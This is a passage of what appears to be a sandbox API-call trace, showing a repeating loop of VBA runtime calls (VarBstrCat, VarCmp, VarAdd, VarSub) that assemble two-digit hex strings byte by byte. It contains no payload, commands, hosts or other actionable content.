[0096.156] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.156] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.156] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.158] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.158] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.158] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.158] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.158] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.158] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.160] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.160] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.160] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.160] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.160] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.160] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.160] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.160] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.160] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.161] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.161] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.161] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.161] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.161] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.161] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.161] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.161] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.161] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.161] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.161] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.161] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.161] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.161] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.161] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.161] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.161] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.161] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.162] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.162] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.162] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.162] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.162] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.162] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.162] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.162] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.162] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.162] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.162] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.162] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.162] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.162] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.163] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.163] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.163] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.163] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.163] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.163] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.163] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.163] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.163] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.163] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.163] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.163] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.163] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.163] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.163] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.163] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.163] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.163] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.164] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.164] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.164] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.164] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.164] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.165] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.165] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.165] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.166] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.166] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.166] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.166] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.166] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.166] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.166] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.166] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.166] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.166] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.166] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.166] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.166] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.167] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.167] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.167] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.167] VarBstrCat (in: bstrLeft="&Ha", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.170] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.170] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.170] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.170] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.170] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.170] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.170] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.170] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.170] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.170] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.170] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.170] VarBstrCat (in: bstrLeft="&H", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.170] VarBstrCat (in: bstrLeft="&H1", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.171] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.171] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.171] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.171] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.171] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.171] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.171] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.171] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.171] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.171] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.171] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.171] VarBstrCat (in: bstrLeft="&H", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.171] VarBstrCat (in: bstrLeft="&He", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.171] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.172] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.172] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.172] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.172] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.172] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.172] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.172] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.172] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.173] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.173] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.173] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.173] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.173] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.173] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.173] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.173] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.173] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.173] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.173] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.173] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.173] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.174] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.174] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.174] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.174] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.174] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.175] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.175] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.175] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.175] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.175] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.175] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.175] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.175] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.175] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.175] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.176] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.176] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.176] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.176] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.176] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.176] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.176] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.176] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.176] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.176] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.176] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.176] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.177] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.177] VarBstrCat (in: bstrLeft="&H", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.177] VarBstrCat (in: bstrLeft="&H4", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.177] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.177] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.177] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.177] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.177] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.177] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.177] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.177] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.178] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.178] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.178] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.178] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.178] VarBstrCat (in: bstrLeft="&Hc", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.178] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.178] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.178] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.178] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.178] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.178] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.178] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.178] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.179] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.179] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.179] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.179] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.181] VarBstrCat (in: bstrLeft="&H3", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.181] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.181] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.181] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.181] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.181] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.181] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.181] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.181] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.181] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.182] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.182] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.182] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.183] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.183] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.183] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.183] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.183] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.183] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.183] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.183] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.183] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.183] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.183] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.183] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.183] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.184] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", 